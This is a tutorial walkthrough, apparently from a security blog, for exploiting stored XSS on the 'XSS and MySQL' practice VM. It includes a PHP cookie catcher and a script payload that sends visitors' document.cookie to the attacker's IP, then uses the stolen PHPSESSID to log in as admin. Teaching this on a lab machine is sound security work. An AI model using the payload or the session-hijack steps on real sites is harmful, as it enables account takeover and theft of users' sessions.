Stored XSS In "XSS and MySQL file"
Refer to the XSS - Cross Site Scripting guide, where I 'm explaining what XSS is and the types of XSS.
This XSS will start as Reflected XSS and will eventually be a Stored XSS
In this guide you will use the VM XSS and MySQL file for the experience and practice.
Open up your Kali machine and search for the VM IP using:
#netdiscover
in my case it's 10.0.2.7
This command will scan your network for live IP's. This might take a while, so be patient.
Of course you can just type in the vm (target machine) if you get access to it:
# ip a
And find out what the IP is, but we want to consider our VM env. as a real target machine.
Open your web browser in your Kali machine and navigate to the IP you discovered, this is what you should see:
If you click on the "Test" you will get a form to leave a comment.
That's a good place to try and practice XSS
Test this website for vulnerabilities to XSS by typing in the "Text" area:
<script>alert(“XSS”)</script>
Click "Submit Query" and you will see the XSS pop up:
Now every time you refresh the page it will pop up again
Now I'm going to guide you on how to use this vulnerability to steal the admin cookie so you can get admin access to the website.
Use the following PHP code. You can write and save it on any folder you like on your Kali machine:
<?php
$cookie = isset($_GET["test"])?$_GET['test']:"";
?>
Name the file as a php extension: "index.php"
The next stage is to run a PHP server in your Kali machine in the same location you saved your "index.php":
stop the apache2 service > # service apache2 stop
run the commend that will start your PHP server on your IP and port 80 > # php -S <your_Kali_IP>:80 (Capital S)
enter
(To stop it, hit Ctrl + C)
in the "My Blog" page, in the comments section, you are going to write a payload that will call your PHP script from the PHP server you just started.
This is the payload:
<script>location.href='http://10.0.2.4/index.php?test='+document.cookie;</script>
what we have here in this payload:
location.href - calling a link/url.
'http://10.0.2.4/opt/index.php - The location of your PHP script on the Kali machine.
?test='+document.cookie - calling the variable that you set in the PHP script, and attach to it the cookies from the website.
When you click the "Submit Query" you will see your Kali address in the URL:
The next step is to wait.
You are going to get the cookies of any one that will check the comments.
You are looking for the admin cookie.
(to add a comment or manage the comments, the user needs to be logged in, that is the reason you will get the username and password that are stored in their cookies)
From the image above you can see that we have a session ID. (in this case look at the last one)
Copy the PHPSESSID value.
You need to add a plugin to your browser called "Cookies manager" (search for it on google or under add-ons), that will help you to manipulate the cookies on any given website.
Once you have the plugin, open it and point it to the URL you are working on.
Change the Value to the PHPSESSID value you copied >> Save >> close the Manager >> refresh the website >> click on the "Admin".
You are now logged in as the admin!
All the guides, tips, and tricks on this web site are for education purpose only, the website owner is not accountable for any use of this information